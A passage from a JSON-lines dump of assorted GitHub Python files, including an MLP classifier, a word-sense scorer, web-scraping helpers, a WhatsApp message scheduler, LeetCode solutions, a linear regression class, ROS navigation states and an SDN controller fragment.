learning\n\n # Backward propagation\n # print \"Backwards propagating...\"\n hidden_error = delta2.dot(np.transpose(wl1))\n delta1 = hidden_error * self.sigmoid(l1, True)\n # print hidden_error.shape, delta1.shape\n delta1 = delta1 * learning\n\n # Update weights\n # print \"Updating weights...\"\n # print l0.shape, delta1.shape\n # print l1.shape, delta2.shape\n wl0 += np.transpose(l0).dot(delta1)\n wl1 += np.transpose(l1).dot(delta2)\n\n self.l0 = wl0\n self.l1 = wl1\n\n def classify(self, data):\n guesses = []\n l2s = []\n # print self.l1\n # print self.l0\n for datum in data:\n datum = datum.items()\n temp1 = []\n for j in range(len(datum)):\n # Only appending the feature at that point\n # Number of features should be the same for all training samples\n temp1.append(datum[j][1])\n sample = np.asarray(temp1)\n sample = sample.flatten()\n\n # Predicting\n l0 = sample # np.asarray([sum(temp1)])\n l1 = self.sigmoid(np.dot(l0, self.l0), False)\n l2 = self.sigmoid(np.dot(l1, self.l1), False)\n # print(l0)\n # print(l1)\n # print(l2)\n # print(np.argmax(l2))\n # exit()\n output = np.argmax(l2)\n 
l2s.append(l2)\n guesses.append(output)\n return guesses\n","repo_name":"fatimaalsaadeh/Artificial-Intelligence","sub_path":"classification_project/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"18196001421","text":"__author__ = 'jeffreyquinn'\nimport pylab\n\n\ndef plot_lines(args, labels, out_fn):\n \"\"\"\n Create an overlayed, multicolored plot of multiple sets of cartesian points\n\n :param args: list-like of 2-tuples of X and Y points to plot\n \"\"\"\n lines = []\n for (idx, (xy, label)) in enumerate(zip(args, labels)):\n lines.append(pylab.plot(xy[0], xy[1], label=label))\n\n pylab.legend(loc=2,\n ncol=1, mode=\"expand\", borderaxespad=0.)\n pylab.savefig(out_fn)\n pylab.close()\n","repo_name":"qwwqwwq/audio_analysis","sub_path":"code/py/viz/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9840875036","text":"#Ausawin Saehaan\r\n#CMSC416\r\n#03/27/2022\r\n#Programming Assignment 4: Word Sense Disambiguation\r\n\r\n#***Purpose***\r\n#This is a separate program from wsd.py, where wsd.py's output is compared with the gold standard \"key\" data, which is named line-key.txt \r\n#The accuracy of the sense tagged output created by wsd.py is calculated here and a confusion matrix is generated as well\r\n\r\n#***How to Use***\r\n#Make sure to download and have all files in the same location (wsd.py, scorer.py, line-test.txt, line-train.txt, line-key.txt)\r\n#Open command prompt (cmd) and change your cmd's directory/location to that of all your files using 'cd'\r\n#Enter the command: python scorer.py my-line-answers.txt line-key.txt \r\n\r\n#***Example Output***\r\n#Overall accuracy of tagging: 95.23809523809523%\r\n#Overall accuracy of baseline sentiment: 57.14285714285714%\r\n#Confusion matrix\r\n\r\n#***Algorithm***\r\n#Read files line-key.txt and my-line-answers.txt as input\r\n#Parse input generated from new files\r\n#Add parsed input into an array/list\r\n#Loop through list and check for matches between the golden standard key and output generated from wsd.py\r\n#If number of matches increase, then accuracy increases; vice versa with decrease in correlation\r\n#Take manipulated inputs and write to confusion matrix\r\n\r\n#Overall accuracy of tagging: 95.23809523809523%\r\n#Overall accuracy of baseline sentiment: 57.14285714285714%\r\n\r\n#Confusion Matrix:\r\n#Actual phone product All\r\n#Prediction\r\n#phone 68 4 72\r\n#product 3 52 55\r\n#All 71 56 127\r\n\r\nfrom sys import argv\r\nimport re\r\nimport pandas as pd\r\n\r\n#system commands called in cmd\r\nargv[1] = \"my-line-answers.txt\"\r\nargv[2] = \"line-key.txt\"\r\n\r\n#read in sense tagged output and gold standard \"key\" data\r\nf = open(argv[1], \"r\")\r\ng = open(argv[2], \"r\")\r\nfileMyAnswers = f.read()\r\nfileKey = g.read()\r\n\r\ni = re.split(r'\\n', str(fileMyAnswers))\r\nj = re.split(r'\\n', str(fileKey))\r\n\r\n#total amount of answer instances\r\nanswerTotal = 126\r\n\r\n#use set intersection to get common answers between both lists \r\nanswerCorrect = list(set(i) & set(j))\r\n\r\n#correct answers / total answers x 100 for a percentage\r\naccuracy = len(answerCorrect)/answerTotal * 100\r\n\r\n#most frequent sense baseline\r\nbaselinePhone = re.findall(r'senseid=(\"phone\")', str(fileKey))\r\nanswerBaseline = len(baselinePhone)/ answerTotal * 100 
\r\n\r\n#lists that will take input phone and product for confusion matrix\r\nsensePredicted = []\r\nsenseActual = []\r\n\r\n#appends correct and incorrect sentiments for matrix\r\nindex = 0\r\nfor index in range(len(i)):\r\n #if index in my-sentiment-answers.txt matches index in sentiment-test-key.txt\r\n if i[index] == j[index]:\r\n #if sense is phone for the matching answers of both files, then add phone to actual and prediction lists\r\n matchPhone = re.search(r'senseid=(\"phone\")',j[index])\r\n if matchPhone:\r\n senseActual.append('phone')\r\n sensePredicted.append('phone')\r\n #adds product senseid to both actual and prediction lists\r\n else:\r\n senseActual.append('product')\r\n sensePredicted.append('product')\r\n #if indices don't match and the sense is product, adds phone to actual list but PRODUCT to prediction list\r\n else:\r\n matchProduct = re.search(r'senseid=(\"product\")',j[index])\r\n if matchProduct:\r\n senseActual.append('phone')\r\n sensePredicted.append('product')\r\n else:\r\n senseActual.append('product')\r\n sensePredicted.append('phone')\r\n\r\n\r\nanswerList = pd.Series(sensePredicted, name = 'Prediction')\r\nkeyList = pd.Series(senseActual, name = 'Actual')\r\nconfusionMatrix = pd.crosstab(answerList, keyList, margins = True)\r\n\r\nprint(\"Overall accuracy of tagging: \" + str(accuracy) + \"%\")\r\nprint(\"Overall accuracy of baseline sense: \" + str(answerBaseline) + \"%\" + \"\\n\")\r\nprint(confusionMatrix)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"saehaana/cmsc416","sub_path":"Word Sense Disambiguation/scorerWSD.py","file_name":"scorerWSD.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22139347906","text":"import re\nimport os\nimport json\nfrom collections import Counter\nfrom urllib.parse import urlparse\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef clean_html(html : str) -> str:\n clean = re.compile('<.*?>')\n clean_text = re.sub(clean, '', html) # remove all html tag\n for char in ['\\n', '\\t', '\\r']: # remove escape character\n clean_text = clean_text.replace(char, '')\n clean_text = re.sub(' +', ' ', clean_text)\n return clean_text\n\ndef remove_unuse_tag(bs : BeautifulSoup) -> BeautifulSoup:\n unuse_tag = ['script', 'style ', 'noscript', 'head', 'footer', 'iframe']\n for tag in unuse_tag:\n for s in bs.select(tag):\n if s != None:\n s.extract()\n return bs\n\ndef count_link_ref(bs : BeautifulSoup, current_domain : str) -> Counter:\n c = Counter()\n s = set()\n for a in bs.find_all('a'):\n try:\n domain = urlparse(a.attrs['href']).netloc\n if (domain in default_domain) and (domain != current_domain):\n if domain not in s:\n s.add(domain)\n c[domain] += 1\n else:\n continue\n except KeyError: # no href found\n continue\n if current_domain in ['collider.com', 'www.cbr.com']:\n c['screenrant.com'] = 0\n if current_domain in ['screenrant.com']:\n c['www.cbr.com'] = 0\n return c\n\ndef get_data(domain : str) -> dict:\n if os.path.exists(f'./data/web-data/{domain}/data.json'):\n data = open(f'./data/web-data/{domain}/data.json', encoding=\"UTF-8\")\n data = json.load(data)\n return data\n else:\n return {}\n \ndef get_metadata(domain : str) -> dict:\n if os.path.exists(f'./data/web-data/{domain}/metadata.json'):\n metadata = open(f'./data/web-data/{domain}/metadata.json', encoding=\"UTF-8\")\n metadata = json.load(metadata)\n metadata['ref'] = Counter(metadata['ref'])\n 
metadata['web'] = set(metadata['web'])\n return metadata\n else:\n metadata = {\n 'domain' : domain,\n 'ref' : Counter(),\n 'web' : set()\n }\n return metadata\n\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88) Gecko/20100101 Firefox/88.0'}\n\ndefault_domain = [\n 'collider.com',\n 'editorial.rottentomatoes.com',\n 'entertainment.ie',\n 'movie2news.com',\n 'movieweb.com',\n 'screenrant.com',\n 'wegotthiscovered.com',\n 'www.cbr.com',\n 'www.cinemablend.com',\n 'www.empireonline.com',\n 'www.hollywoodreporter.com',\n 'www.irishtimes.com',\n 'www.ign.com',\n 'www.joblo.com',\n 'www.movienewsnet.com',\n 'www.nme.com',\n 'www.sanook.com',\n 'www.slashfilm.com',\n 'www.thewrap.com',\n 'www.firstshowing.net'\n]","repo_name":"ThanabodeeSaepui/EZ-Scrap","sub_path":"WebScrap/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10068968113","text":"import pywhatkit\r\n\r\nfrom datetime import datetime\r\n\r\n\r\n\r\ndef clk():\r\n\r\n con=True\r\n\r\n while con:\r\n\r\n try:\r\n\r\n H=int(input(\"Enter the hour in 24 hour clock format:\"))\r\n\r\n M=int(input(\"Enter the minute in 24 hour clock format:\"))\r\n\r\n except:\r\n\r\n print(\"\\nInvalid time. Enter digits. Please re-enter\")\r\n\r\n else:\r\n\r\n now=datetime.now()\r\n\r\n h=int(now.strftime(\"%H\"))\r\n\r\n m=int(now.strftime(\"%M\"))\r\n\r\n if H>=h and M>m+1 :\r\n\r\n if 0<=H<=24 and 0<=M<60:\r\n\r\n con=False\r\n\r\n else:\r\n\r\n print(\"\\nInvalid time. Please re-enter\")\r\n\r\n else:\r\n\r\n if 0<=H<=24 and 0<=M<60:\r\n\r\n print(\"Message Will be sent tomorrow\")\r\n\r\n w=input(\"Is it okay ( y-yes , n-no ) :\")\r\n\r\n if w==\"y\" or w==\"Y\":\r\n\r\n con=False\r\n\r\n else:\r\n\r\n print(\"\\nPlease re-enter time.\")\r\n\r\n else:\r\n\r\n print(\"\\nInvalid time. Please re-enter\")\r\n\r\n return H,M\r\n\r\n\r\n\r\ndef num():\r\n\r\n con=True\r\n\r\n while con:\r\n\r\n k=\"+94\"+str(input(\"Please the phone number : +94\"))\r\n\r\n if len(k)==12:\r\n\r\n try:\r\n\r\n v=int(k[1:])\r\n\r\n con=False\r\n\r\n except:\r\n\r\n print(\"\\nPlease enter a valid phone number.\")\r\n\r\n else:\r\n\r\n print(\"\\nPlease enter a valid phone number.\")\r\n\r\n return k\r\n\r\n \r\n\r\n\r\n\r\nnumber=num()\r\n\r\nmsg=str(input(\"Please enter your message :\"))\r\n\r\nhour,minute=clk()\r\n\r\nprint(\"\\n \\n Please wait. Your message is processing. 
Message will be sent at \"+str(hour)+\":\"+str(minute))\r\n\r\npywhatkit.sendwhatmsg(number,msg,hour,minute,60)\r\n\r\nprint(\"\\n \\n Your message sent successfully\")\r\n\r\n","repo_name":"vps4618/spambots","sub_path":"dist1/whatsapp_auto.py","file_name":"whatsapp_auto.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71868535319","text":"class Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n x = sorted(nums1 + nums2)\n if (len(x))%2 != 0:\n return x[len(x)//2]\n else:\n return float((x[int(len(x)//2)] + x [int((len(x)//2)-1)]))/2\n ","repo_name":"Paulie-Aditya/leetcode_problems","sub_path":"0004-median-of-two-sorted-arrays/0004-median-of-two-sorted-arrays.py","file_name":"0004-median-of-two-sorted-arrays.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33885870267","text":"import numpy as np\nimport pandas as pd\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\n\n\nclass LinearRegression(object):\n\n def __init__(self, learning_rate=0.001, epoch=1000):\n self.w = None\n self.lr = learning_rate\n self.epoch = epoch\n self.error = []\n self.epoch_cycle = []\n self.r2_score = None\n\n def fit(self, X, y, ridge_parameter = 0): \n self.w = np.zeros((1, X.shape[1]))\n X = np.array(X)\n for i in range(self.epoch):\n y_pred = X.dot(self.w.T)\n self.error.append(self.__mse__(y, y_pred))\n self.epoch_cycle.append(i)\n dw = self.gradient_descent(y_pred, y, X)\n correction = -(self.lr * dw) + 2*ridge_parameter*self.w\n self.w += correction\n print(self.w)\n \n def gradient_descent(self, y_pred, y_act, X):\n y_act = np.array(y_act).reshape(len(y_act), 1)\n diff = y_act - y_pred\n dw = -2*diff.T@(X)\n return dw\n \n def predict(self, X_test):\n return X_test.dot(self.w.T)\n \n def __mse__(self, y, y_hat):\n y = np.array(y).reshape(len(y), 1)\n diff = y - y_hat\n return 0.5 * np.array(diff.T@diff)[0][0]\n \n def plot_error(self):\n plt.plot(self.epoch_cycle, self.error)\n plt.xlabel(\"epochs\")\n plt.ylabel(\"MSE\")\n \n def score(self, x_test, y_test):\n y_pred = self.predict(x_test)[0]\n y_test_pred = np.array(y_pred.values.tolist())\n y_test = np.array(y_test.values.tolist())\n ssr = np.sum((y_pred - y_test)**2)\n sst = np.sum((y_test - np.mean(y_test))**2)\n self.r2_score = 1 - (ssr/sst)\n return self.r2_score\n\n\n\n# secondary_df = pd.read_csv('all_features.csv')\n# X_one_degree = secondary_df[['theta', 'theta_dot', 'constant']]\n# Y_one_degree = secondary_df['theta_ddot']\n# from sklearn.model_selection import train_test_split\n\n# X_1_train, X_1_test, y_1_train, y_1_test = train_test_split(X_one_degree, Y_one_degree, test_size=0.2, random_state=42)\n# lr_one_deg = LinearRegression()\n# lr_one_deg.fit(X_1_train, y_1_train)\n# lr_one_deg.plot_error()\n# plt.show()","repo_name":"Daishinkan002/ML-DL_Algorithms_from_Scratch","sub_path":"Custom_Linear_Regression.py","file_name":"Custom_Linear_Regression.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74626230676","text":"\"\"\"\nGiven an array with n objects colored red, white or blue, sort them so that objects of the same color are adjacent, with the colors in the order red, white and blue.\n\nHere, we will use 
the integers 0, 1, and 2 to represent the color red, white, and blue respectively.\n\nNote:\nYou are not suppose to use the library's sort function for this problem.\n\nclick to show follow up.\n\nFollow up:\nA rather straight forward solution is a two-pass algorithm using counting sort.\nFirst, iterate the array counting number of 0's, 1's, and 2's, then overwrite array with total number of 0's, then 1's and followed by 2's.\n\nCould you come up with an one-pass algorithm using only constant space?\n\"\"\"\n\n\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n \"\"\"\n Method 1: Dutch National Flag - Two Pointer Approach\n Your runtime beats 75.39 % of python submissions\n\n while mid <= high:\n IF mid == 0: SWAP mid and low\n IF mid == 1: NO SWAP, mid += 1\n IF mid == 2: SWAP mid and high\n \"\"\"\n\n low = 0\n mid = 0\n high = len(nums) - 1\n\n while mid <= high:\n if nums[mid] == 0:\n nums[mid], nums[low] = nums[low], nums[mid]\n low += 1\n mid += 1\n\n elif nums[mid] == 1:\n mid += 1\n\n else:\n nums[mid], nums[high] = nums[high], nums[mid]\n high -= 1\n\n","repo_name":"KartikKannapur/Algorithms","sub_path":"00_Code/01_LeetCode/75_SortColors.py","file_name":"75_SortColors.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"34199723331","text":"# Customized functions specifically for the Soundscape Attributes Translation Project (SATP) database\n\nimport pandas as pd\n\n\ndef _url_fetch(version: str) -> str:\n \"\"\"\n Return the URL to fetch the SATP dataset from Zenodo.\n Parameters\n ----------\n version : str\n Version of the dataset to load.\n Returns\n -------\n url : str\n URL to fetch the SATP dataset from Zenodo.\n \"\"\"\n if version.lower() not in [\"latest\", \"v1.2.1\", \"v1.2\"]:\n raise ValueError(\n \"Invalid version. Should be either 'latest', 'v1.2.1', or 'v1.2'.\"\n )\n\n version = \"v1.2.1\" if version == \"latest\" else version.lower()\n if version in [\"v1.2.1\", \"v1.2\"]:\n url = \"https://zenodo.org/record/7143599/files/SATP%20Dataset%20v1.2.xlsx\"\n\n return url\n\n\ndef load_zenodo(version: str = \"latest\") -> pd.DataFrame:\n \"\"\"\n Load the SATP dataset from Zenodo.\n Parameters\n ----------\n version : str, optional\n Version of the dataset to load. The default is \"latest\".\n Returns\n -------\n df : pandas.DataFrame\n Dataframe containing the SATP dataset.\n \"\"\"\n url = _url_fetch(version)\n return pd.read_excel(url, engine=\"openpyxl\", sheet_name=\"Main Merge\")\n\n\ndef load_participants(version: str = \"latest\") -> pd.DataFrame:\n \"\"\"\n Load the SATP participants dataset from Zenodo.\n Parameters\n ----------\n version : str, optional\n Version of the dataset to load. 
The default is \"latest\".\n Returns\n -------\n df : pandas.DataFrame\n Dataframe containing the SATP participants dataset.\n \"\"\"\n url = _url_fetch(version)\n return pd.read_excel(url, engine=\"openpyxl\", sheet_name=\"Participants\").drop(\n columns=[\"Unnamed: 3\", \"Unnamed: 4\"]\n )\n","repo_name":"MitchellAcoustics/Soundscapy","sub_path":"soundscapy/databases/satp.py","file_name":"satp.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"85"} +{"seq_id":"29010750991","text":"import art\nimport os\n\nprint(art.logo)\nprint(\"Welcome to the Secret Auction.\")\n\nauction_dictionary = {}\nmax_bidder = \"\"\nmax_bid_amount = 0\n\nplay_again = True\nwhile play_again:\n name = input(\"What is your name?: \")\n bid = int(input(\"What's your bid?: $\"))\n\n auction_dictionary[name] = bid\n\n other_bidders = input(\"Are there any other bidders? Type 'yes' or 'no'. \").lower()\n if other_bidders == 'yes':\n os.system('cls')\n if other_bidders == 'no':\n for key in auction_dictionary:\n if auction_dictionary[key] > max_bid_amount:\n max_bid_amount = auction_dictionary[key]\n max_bidder = key\n\n max_bid_text = str(max_bid_amount)\n print(\"The winner is \" + max_bidder + \" with a bid of $\" + max_bid_text)\n play_again = False\n","repo_name":"alexislayvu/Python-Projects","sub_path":"Secret Auction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8681070614","text":"import actionlib\nimport rospy\nimport smach\n\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\nfrom geometry_msgs.msg import Twist\n\n\nclass DriveState(smach.State):\n \"\"\"A state that can directly control the robot.\"\"\"\n\n def __init__(self, outcomes, rate_hz=10):\n smach.State.__init__(self, outcomes=outcomes)\n self.rate = rospy.Rate(rate_hz)\n self.pub_node = rospy.Publisher(\"cmd_vel\", Twist, queue_size=1)\n\n def execute(self, userdata):\n raise NotImplementedError()\n\n\nclass NavState(smach.State):\n \"\"\"A state that uses the nav stack to control the robot.\"\"\"\n\n def __init__(self, outcomes):\n smach.State.__init__(self, outcomes=outcomes)\n self.client = actionlib.SimpleActionClient(\"move_base\", MoveBaseAction)\n self.client.wait_for_server()\n\n def execute(self, userdata):\n raise NotImplementedError()\n\n def move_to_relative_point(self, position, orientation, relative_frame, block=True):\n \"\"\"Use the move base server to navigate to a point.\n\n :param positin: A position relative to the relative_frame coord frame\n :param orientation: Orientation relative to relative_frame\n \"\"\"\n goal = MoveBaseGoal()\n goal.target_pose.header.frame_id = relative_frame\n goal.target_pose.pose.position = position\n goal.target_pose.pose.orientation = orientation\n self.client.send_goal(goal)\n if block:\n self.client.wait_for_result()\n","repo_name":"bofrim/Experimental-Mobile-Robotics","sub_path":"comp4/src/utility_states.py","file_name":"utility_states.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19000440543","text":"from prac6.guitar import Guitar\n\nguitars = []\nprint(\"My guitars!\")\n\nguitars.append(Guitar(\"Gibson L-5 CES\", 1922, 16035.40))\nguitars.append(Guitar(\"Line 6 JTV-59\", 2010, 1512.9))\n\nprint(\"\\nThese are my guitars:\")\nfor i, guitar in 
enumerate(guitars):\n if guitar.is_vintage():\n vintage_string = \"(vintage)\"\n else:\n vintage_string = \"\"\n print(\"Guitar {}: {:<15} ({}), worth ${:10,.2f}{}\".format(i + 1, guitar.name, guitar.year, guitar.cost, vintage_string))","repo_name":"yangyangli714/CP1404pracs","sub_path":"prac6/guitars.py","file_name":"guitars.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19331332058","text":"#\n# Create by Hua on 9/14/22\n#\n\n\"\"\"\nYou are given an m x n integer matrix points (0-indexed). Starting with 0 points, you want to maximize the number of points you can get from the matrix.\n\nTo gain points, you must pick one cell in each row. Picking the cell at coordinates (r, c) will add points[r][c] to your score.\n\nHowever, you will lose points if you pick a cell too far from the cell that you picked in the previous row. For every two adjacent rows r and r + 1 (where 0 <= r < m - 1), picking cells at coordinates (r, c1) and (r + 1, c2) will subtract abs(c1 - c2) from your score.\n\nReturn the maximum number of points you can achieve.\n\nabs(x) is defined as:\n\nx for x >= 0.\n-x for x < 0.\n\n\nExample 1:\n\n\nInput: points = [[1,2,3],[1,5,1],[3,1,1]]\nOutput: 9\nExplanation:\nThe blue cells denote the optimal cells to pick, which have coordinates (0, 2), (1, 1), and (2, 0).\nYou add 3 + 5 + 3 = 11 to your score.\nHowever, you must subtract abs(2 - 1) + abs(1 - 0) = 2 from your score.\nYour final score is 11 - 2 = 9.\nExample 2:\n\n\nInput: points = [[1,5],[2,3],[4,2]]\nOutput: 11\nExplanation:\nThe blue cells denote the optimal cells to pick, which have coordinates (0, 1), (1, 1), and (2, 0).\nYou add 5 + 3 + 4 = 12 to your score.\nHowever, you must subtract abs(1 - 1) + abs(1 - 0) = 1 from your score.\nYour final score is 12 - 1 = 11.\n\n\nConstraints:\n\nm == points.length\nn == points[r].length\n1 <= m, n <= 105\n1 <= m * n <= 105\n0 <= points[r][c] <= 105\n\n\"\"\"\n\n\nclass Solution(object):\n def maxPoints(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: int\n\n thought: 2d dp. each dp contains the max value picked so far, return the max of last row.\n time: BF solution is o(m*n*n), which will TLE, given m*n == 10^5\n for each point, it will check n times; and there are m*n points.\n\n the hard part is how to optimize it from o(m*n*n) to o(m*n)\n\n the optimization idea is to check both left and right elements.\n\n similar problem, check out 1014 and 931.\n\n 09/14/2022 15:50\tAccepted\t3721 ms\t50.1 MB\tpython\n medium - hard(if must optimize the solution to o(m*n), not very intuitive)\n google.\n dp.\n\n \"\"\"\n m,n = len(points), len(points[0])\n dp = [0]* n\n for i in range(m):\n for j in range(n): # means choose the item directly above\n dp[j] += points[i][j]\n\n for j in range(n-2, -1,-1): # choose item from its right\n dp[j] = max(dp[j], dp[j+1] -1)\n\n for j in range(1,n): # choose item from its left\n dp[j] = max(dp[j], dp[j-1] - 1)\n\n return max(dp) # return cur will be error if only one row\n\nclass Solution_easy_understand(object):\n def maxPoints(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: int\n\n thought: 2d dp. 
each dp contains the max value picked so far, return the max of last row.\n time: BF solution is o(m*n*n), which will TLE, given m*n == 10^5\n for each point, it will check n times; and there are m*n points.\n\n the hard part is how to optimize it from o(m*n*n) to o(m*n)\n\n the optimization idea is to check both left and right elements.\n\n So for each element in a row, instead of traversing prev whole row\n what we can do is that keep left and right vectors to get max from 0 to i-1th in left side, and i+1th to n-1 in right side\n\n left[i] = max(point[i], left[i-1] - 1)\n now why this?\n\n Now for each cell max is one of when same col, from left side, from right side\n\n using left we will get max from left side, using right vector we will get max from right side\n and at each step we will also compare them with same col val\n\n so for left[0] = prev[0], because there is no element in left side\n for left[1] = max(prev[1], left[0] - 1), this -1 is the difference in cols (0 - 1)\n\n Now next step is important\n for left[2] = max(prev[2], left[1]-1)\n\n at this step, if left[1] had value of just above then we had only subtracted 1 from it, and only 1 should be subtracted only\n but if left[1] had left[0]-1 in it, then left[2] = left[0] - 2, now we can see it automatically subtracted 2 if 0th was max\n\n\n similar problem, check out 1014 and 931.\n https://leetcode.com/problems/maximum-number-of-points-with-cost/discuss/1344888/C%2B%2B-dp-from-O(m-*-n-*-n)-to-O(m-*-n)\n\n 09/14/2022 15:40\tAccepted\t3367 ms\t50.1 MB\tpython\n medium - hard(if must optimize the solution to o(m*n), not very intuitive)\n \"\"\"\n m,n = len(points), len(points[0])\n left, right, pre,cur = [0]*n, [0]*n,[0]*n,[0]*n\n\n # init pre\n for i in range(n):\n pre[i] = points[0][i]\n\n for i in range(1, m):\n # right to left\n right[n-1] = pre[n-1]\n for j in range(n-2,-1,-1):\n right[j] = max(pre[j], right[j+1] - 1)\n\n # left to right\n left[0] = pre[0]\n for j in range(1,n):\n left[j] = max(pre[j], left[j-1] - 1)\n\n # combine\n for j in range(n):\n cur[j] = points[i][j] + max(left[j], right[j])\n\n pre = cur\n return max(pre) # return cur will be error if only one row\n\n\n","repo_name":"zerghua/leetcode-python","sub_path":"dp/N1937_MaximumNumberofPointswithCost.py","file_name":"N1937_MaximumNumberofPointswithCost.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"29004814234","text":"\n\n\nfrom typing import List\n\n\nclass Solution:\n def combinationSum4(self, nums: List[int], target: int) -> int:\n \"\"\"经典背包问题\"\"\"\n dp = [0] * (target + 1)\n dp[0] = 1 # 空集和为0,即为1种方案!非常的关键\n for i in range(1, len(dp)):\n for num in nums:\n if i >= num:\n dp[i] += dp[i - num]\n return dp[-1]\n\n def baoli(self, nums, target):\n def helper(nums, target):\n if target < 0:\n return\n\n if target == 0:\n self.res1 += 1\n\n for i in range(len(nums)):\n helper(nums, target - nums[i])\n\n self.res1 = 0\n helper(nums, target)\n return self.res1","repo_name":"Annihilation7/Leetcode-Love","sub_path":"2020-03/3-25/377数组总和IV/377.py","file_name":"377.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73545195159","text":"import os\nfrom typing import List, Tuple, Any\nfrom graphviz import Digraph as gDigraph\nfrom networkx import DiGraph as nDigraph\n\nfrom DataObjects.ClassMultiDict import MultiDict\n\n\nclass ParserPCCGraph:\n 
EdgeFontSizeInt = '10'\n EdgeFontSizeLoop = '8'\n NodeFontSizeLoop = '12'\n TextFontSize = '15'\n\n def __init__(self, header: str, edges: List[Tuple[str]], option=0, show_pdf = True):\n # Compass points currently not used, as not more than 4 loops were observed\n # CompassPoints=[\"n\",\"ne\",\"e\",\"se\",\"s\",\"sw\",\"w\",\"nw\",\"c\",\"_\"]\n\n # Create FSM graphs\n self.graph = gDigraph(header, filename=(header + '.gv'), engine='dot')\n # Use Splines and resolve Node overlapping\n self.graph.attr(splines='true')\n # Graph direction\n self.graph.attr(rankdir='LR') # 'LR'\n # Internode and edge spacing\n\n if option == 0:\n self.graph.attr(nodesep='0.4', ranksep='2')\n self.graph.attr(ratio='0.5')\n else:\n self.graph.attr(nodesep='0.1', ranksep='0.3')\n self.graph.attr(ratio='0.2')\n\n # Label[RespMsg,FinalState]\n self.graph.attr(label=header, fontsize=self.TextFontSize)\n\n self._pedges(edges)\n\n if show_pdf:\n self.graph.view(header, os.getcwd(), False)\n else:\n self.graph.render(header, os.getcwd())\n\n def _pedges(self, edges, color='black'):\n multi_state_dict = MultiDict()\n for edge in edges:\n\n first_node = edge[0]\n if str(first_node) in multi_state_dict:\n if first_node not in multi_state_dict[str(first_node)]:\n multi_state_dict[str(first_node)] = first_node\n else:\n multi_state_dict[str(first_node)] = first_node\n\n first_index = str(multi_state_dict[str(first_node)].index(first_node))\n\n second_node = edge[1]\n if str(second_node) in multi_state_dict:\n if second_node not in multi_state_dict[str(second_node)]:\n multi_state_dict[str(second_node)] = second_node\n else:\n multi_state_dict[str(second_node)] = second_node\n\n second_index = str(multi_state_dict[str(second_node)].index(second_node))\n\n self.graph.edge(str(edge[0]) + first_index,\n str(edge[1]) + second_index,\n fontsize=self.EdgeFontSizeInt,\n fontcolor=color\n )\n @staticmethod\n def debug_process_graph(process_tree: nDigraph, transition_label: str, show_graph: bool = True):\n edges = [e for e in process_tree.edges]\n ParserPCCGraph(transition_label, edges, 0, show_graph)\n","repo_name":"Errare-humanum-est/HeteroGen","sub_path":"Debug/Graphv/ParserNetworkxGraph.py","file_name":"ParserNetworkxGraph.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"33846760360","text":"from pox.core import core\nimport pox.openflow.libopenflow_01 as of\nfrom pox.lib.addresses import IPAddr\n\nclass Chris( object ):\n\n\tdef __init__(self):\n\t\tcore.openflow.addListeners(self)\n\n\tdef _handle_PacketIn(self, event):\n\n\t\t\n\t\tdef host1():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 1\n\t\t\tmsg.match.tp_dst = 8000\n\t\t\tmsg.match.nw_dst = IPAddr(\"10.0.0.3\")\n\t\t\tmsg.actions.append(of.ofp_action_output(port = 3))\n\t\t\tevent.connection.send(msg)\n\n\t\tdef host2():\n\t\t\tmsg = of.ofp_flow_mod()\n\t\t\tmsg.match.in_port = 2\n\t\t\tmsg.match.tp_dst = 8000\n\t\t\tmsg.match.nw_dst = 